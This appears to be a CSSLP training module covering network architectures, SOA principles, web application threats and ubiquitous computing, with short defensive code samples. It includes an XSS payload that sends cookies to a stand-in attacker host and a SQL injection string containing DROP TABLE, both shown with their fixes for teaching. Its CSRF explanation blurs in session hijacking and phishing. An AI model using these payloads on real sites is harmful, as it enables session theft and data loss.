CSSLP Tutorial: Module 03,Part 05 – Common Network Architectures

Common Architectures

In this section, we are going to discuss security and the common network architectures in use today. Major concepts will include: centralized versus distributed computing, the ideas behind service-oriented architecture, rich internet applications, ubiquitous computing, and cloud architecture. Centralized computing is a bit of an older idea, but we'll use it for comparison. Service-oriented architecture has a lot of ideas associated with it. Rich internet applications are important for increasing functionality, and ubiquitous computing is best seen in action through a variety of examples, which we'll walk through. Cloud architecture, the last subject, is only introduced here; it will be discussed more fully in the next section.

It used to be that everyone had a dumb terminal on their desktop, controlled by a centralized main controller, one of those huge mainframe machines. That type of centralization gives us the thin client. From that model, we moved on to a more distributed environment, where each user has their own processing power at their desktop, known as a fat client. Comparing those two systems will be the main part of this discussion. Going back 10 to 15 years, the setup was a main controller in a huge mainframe-type computer. The mainframe did all the work, all the processing, all the effort. On each user's desktop sat a dumb terminal. This centralized system gives us the ultimate thin client, and with thin clients comes very low functionality.

Apart from the mainframe, the terminal cannot import or export any information; there are no drives and no operating system to allow for those functions, so the hardware requirements are very low. From this centralized computing system we moved to a more distributed one, with a powerful machine on each user's desktop. Rather than dumb terminals, each machine has drives for importing and exporting and can perform high-level functions. The problem is that these machines run about $2,000 each, and if you have, say, 200 employees using them, it gets quite expensive, and not only for the initial purchase but also for the maintenance costs. As a rule of thumb they have to be upgraded every three years, and in some cases replaced completely. Here is where the benefit of centralized computing comes into play: the thin client isn't nearly as expensive, so it saves the organization money. The fat clients are much better for exporting or importing media and information, but that very capability is what makes the locked-down thin client the better security route. Centralization is also more beneficial in client-server environments with respect to scalability: a client-server environment makes it very easy to add hosts and can support a very large environment.
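To put rough numbers on that trade-off, here is a minimal sketch using the $2,000-per-workstation and 200-user figures from the example above. The thin-client unit price and central server cost are illustrative assumptions, not quoted prices.

```python
# Rough cost comparison of fat clients vs. thin clients.
# FAT_CLIENT_UNIT and USERS come from the example in the text;
# THIN_CLIENT_UNIT and CENTRAL_SERVER are assumed figures for illustration.

FAT_CLIENT_UNIT = 2_000        # per-desktop workstation (from the example)
THIN_CLIENT_UNIT = 300         # assumed price of a basic thin terminal
CENTRAL_SERVER = 25_000        # assumed cost of the central server/mainframe
USERS = 200

fat_total = FAT_CLIENT_UNIT * USERS
thin_total = THIN_CLIENT_UNIT * USERS + CENTRAL_SERVER

print(f"Fat clients:  ${fat_total:,}")   # $400,000 up front
print(f"Thin clients: ${thin_total:,}")  # $85,000 up front
```

Even with generous assumptions, the centralized option is far cheaper to deploy, which is exactly the savings argument made above.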

There are several considerations in building that client-server design. A client-server environment is usually very centralized. First is the maintenance of the servers: we create our policies on the server, the main controller, and when a user logs in to it, they get the policy. This centralization is easy to secure and manage. But it hasn't always been this easy. Prior to the client-server environment there were peer-to-peer networks with file sharing; perhaps the best known was Napster. Peer-to-peer sharing like that gives you a bit of both kinds of distributed computing: the file transfers are distributed, end user to end user, while the index of what is available is somewhat centralized, which cuts down on our effort and makes it easier to secure and manage. So it has aspects of both models, and it was the compromise before service-oriented architecture.

Service-oriented architecture goes back to the idea of modularization. Instead of one application that does everything, we want each module to perform a particular service so it can be used again and again in different contexts. This architecture is a much more efficient means of development, and it's much more vendor neutral: there can be integration and communication among multiple vendors because we're using neutral services. Under service-oriented architecture there are several foundational ideas, for example loose coupling, abstraction, composability, reusability, autonomy, discoverability, and so on. Loose coupling means the individual modules are independent of each other; they don't have to rely on other modules and keep a certain degree of independence. Abstraction means these objects perform a specific, particular function without being concerned with the details of how the other pieces work. Service-oriented architecture is ultimately about a vendor-neutral network of communication and functionality that's reusable and modular in design, as the sketch below illustrates.
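Here is a minimal sketch of loose coupling and abstraction in that style. The names (TaxService, FlatTax, checkout) are hypothetical; the point is that the consumer depends only on the abstract contract, so implementations can be swapped or reused in other contexts.

```python
# Loose coupling and abstraction: the caller knows *what* the service offers,
# not *how* it is implemented.
from abc import ABC, abstractmethod


class TaxService(ABC):
    """Abstract contract for a reusable tax-calculation service."""

    @abstractmethod
    def tax_for(self, amount: float, region: str) -> float: ...


class FlatTax(TaxService):
    def tax_for(self, amount: float, region: str) -> float:
        return round(amount * 0.07, 2)      # one interchangeable implementation


def checkout(subtotal: float, region: str, tax_service: TaxService) -> float:
    # Loose coupling: checkout never imports a concrete tax module directly,
    # so any TaxService implementation can be plugged in.
    return subtotal + tax_service.tax_for(subtotal, region)


print(checkout(100.00, "US-TX", FlatTax()))  # 107.0
```

Because checkout only sees the abstract interface, a different vendor's implementation could replace FlatTax without touching the consumer, which is the reusability and vendor neutrality the architecture is after.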

Another set of applications to look at are those that get their richness through the internet. Web applications increase the functionality of our terminals, and the high-powered machines in today's offices, with that higher degree of interaction and functionality, also present a larger attack surface. There are two sides to attacks on web applications: client-side threats and server-side threats. Client-side threats include cross-site scripting and the CSRF attack, cross-site request forgery, sometimes pronounced "C-surf." With cross-site scripting, an attacker takes advantage of a trusted website that doesn't perform proper input validation, so injecting code is easy. What they're looking to do is trick the user into visiting a page that carries malicious code which then runs in the user's browser. The cross-site script takes advantage of my trust in a website.
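Here is a minimal illustration of why that works and how output encoding blunts it. The "comment" value stands in for any untrusted input a trusted site echoes back without validation; the page snippet is hypothetical.

```python
# Reflected XSS in miniature: untrusted input echoed into a page.
import html

untrusted_comment = '<script>document.location="http://evil.example/?c="+document.cookie</script>'

# Vulnerable: the untrusted value is dropped straight into the page,
# so the victim's browser runs the attacker's script with the site's trust.
unsafe_page = f"<p>Latest comment: {untrusted_comment}</p>"

# Safer: encode the value so the browser renders it as text, not markup.
safe_page = f"<p>Latest comment: {html.escape(untrusted_comment)}</p>"

print(unsafe_page)
print(safe_page)   # &lt;script&gt;...&lt;/script&gt; -- displayed, never executed
```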

A CSRF, on the other hand, takes advantage of a website's trust in me. For example, when you establish a connection to a website, there's information about the session, including a session ID created when you access the site. That's an opportunity for someone to compromise the session ID and use it maliciously. This is where the link in an email comes into play: the email may look official but isn't actually from the organization. They may even phone you to have you log into your site, and when you click the link in the email or go to the site they've directed you to, you've launched an application that can be malicious. That application could also steal cookies and other session information. Whether the information is stored unencrypted or encrypted doesn't really matter, because the attacker simply reuses it rather than trying to figure out the sequence. With cross-site request forgery, the attacker steals that authentication to impersonate a real user.
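A common defense is a per-session anti-CSRF token. The sketch below assumes a hypothetical session store and form handler; the idea is that a forged request riding on the victim's cookie still doesn't know the secret token, so the server refuses it.

```python
# Anti-CSRF token pattern in miniature.
import hmac
import secrets

session = {"user": "alice"}          # stand-in for real server-side session state

def issue_form(session: dict) -> str:
    """Embed a fresh random token in the form and remember it server-side."""
    session["csrf_token"] = secrets.token_urlsafe(32)
    return f'<input type="hidden" name="csrf_token" value="{session["csrf_token"]}">'

def handle_post(session: dict, submitted_token: str) -> str:
    # Constant-time comparison of the submitted token with the stored one.
    if hmac.compare_digest(session.get("csrf_token", ""), submitted_token):
        return "state-changing action performed"
    return "rejected: possible cross-site request forgery"

issue_form(session)
print(handle_post(session, session["csrf_token"]))   # legitimate form post
print(handle_post(session, "guessed-or-missing"))    # forged request is refused
```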

So many of our applications require user input, whether it's a username, a password, city/state/address, or customer-satisfaction feedback, and we solicit that information through public forms; it could even be prompted by a fake customer survey. When this happens, whatever is entered into the web application can eventually reach the back-end database, and if it reaches the database it can be processed by the database. We want to make sure no one is entering commands like DROP TABLE into the database; there is no person out there whose name is actually "Johnny Droptable." So we have to cleanse our data and make sure it is inspected. We want to validate that no database command language is being slipped in through the input, and we do that through an interface: the interface acts as a funnel that keeps untrusted users away from your protected resources. A Common Gateway Interface (CGI) script can watch for and inspect these possible server-side threats.
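Here is a minimal sketch of handling the "Johnny Droptable" problem, using an in-memory SQLite table as a stand-in for the back-end database. Parameterized queries hand the input to the database as data only, never as a command.

```python
# Keeping hostile input out of the SQL command stream.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE customers (name TEXT)")

user_input = "Robert'); DROP TABLE customers;--"   # hostile "name" from a web form

# A vulnerable pattern would concatenate user_input into the SQL string,
# letting the DROP TABLE execute. The placeholder below treats it as data only.
conn.execute("INSERT INTO customers (name) VALUES (?)", (user_input,))

rows = conn.execute("SELECT name FROM customers").fetchall()
print(rows)   # the hostile string is stored as plain text; the table survives
```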

Other possible threats against a server involve aggregation, inference, and polyinstantiation. Aggregation is when information is collected or accumulated all together; inference is the next step, where assumptions are drawn from that collected information by the application or person trying to tamper with it. One way to prevent aggregation and inference threats is by masking information: for example, showing asterisks instead of the password, or replacing the Social Security number with symbols so only the last four digits show. Masking is a great way to prevent the threats caused by aggregation and inference.
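A minimal sketch of that kind of masking is below; the function name and formatting are illustrative, not a standard.

```python
# Show only the last few characters of a sensitive value, hide the rest.
def mask(value: str, visible: int = 4, symbol: str = "*") -> str:
    digits = value.replace("-", "")
    hidden = symbol * (len(digits) - visible)
    return hidden + digits[-visible:]

print(mask("123-45-6789"))        # *****6789         (SSN, last four visible)
print(mask("4111111111111111"))   # ************1111  (card number)
```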

Polyinstantiation, however, is basically a really big word for a lie. When something has top-level security, rather than labeling the file as such, we can label it as something boring that people at lower classifications are allowed to see. That way we prevent someone from realizing they are near sensitive information. For example, when a person without the clearance logs into a database, a shipment is marked as food for India, so it doesn't seem interesting. When a person with top-secret clearance logs into the same database, they see that the record is actually a list of munitions being shipped to help in an area under siege. It's a preventative measure to keep those without the clearance level from getting curious and peeking, if you will. Those are some of the server-side threats.
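Before moving to the client side, here is a minimal sketch of that polyinstantiation example: the same shipment record exists at two classification levels, and a lookup returns the instance the reader is cleared to see. The clearance labels and lookup logic are simplified assumptions.

```python
# Two instances of the same record, one per classification level.
CLEARANCE_RANK = {"unclassified": 0, "top_secret": 1}

shipments = [
    {"id": 42, "level": "unclassified", "cargo": "food relief for India"},
    {"id": 42, "level": "top_secret",   "cargo": "munitions for the besieged area"},
]

def view_shipment(shipment_id: int, clearance: str) -> str:
    # Return the highest-classified instance the reader is allowed to see.
    visible = [s for s in shipments
               if s["id"] == shipment_id
               and CLEARANCE_RANK[s["level"]] <= CLEARANCE_RANK[clearance]]
    return max(visible, key=lambda s: CLEARANCE_RANK[s["level"]])["cargo"]

print(view_shipment(42, "unclassified"))   # food relief for India
print(view_shipment(42, "top_secret"))     # munitions for the besieged area
```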

On the other hand, threats on the client side come from scripts that run on our system when we go to a webpage. These can be JavaScript or ActiveX controls, both of which are very, very powerful. We think we're visiting a trusted website, but instead we're allowing scripts to run on our system, which can pose a real threat.

There is wireless technology everywhere you look. It can be found wherever people are communicating or wherever information is being transferred. For example, it's in our vehicles as part of the controls. There is also some of this ubiquitous computing in pacemakers and other medical devices associated with health care needs. Wireless networking in restaurants, coffee shops, and cyber cafes, all of these places, creates the potential for eavesdropping or manipulation of some kind.

There's radio frequency ID (RFID), found in the chips on credit cards and in passports, where a chip in the sleeve of the little booklet holds the person's specific information. RFID is also in the chips of highway toll transponders like E-ZPass. Near field communication (NFC) is becoming very popular; for example, in a hotel, rather than swiping the keycard, you just hold it near the pad and it unlocks the door. Then there are location-based services like the GPS in the car. There is all kinds of computing going on in the world today, and it's discussed here because, again, any time your machine makes a connection, there are possibilities for vulnerabilities. The last subject, cloud architecture, will be studied in the next section.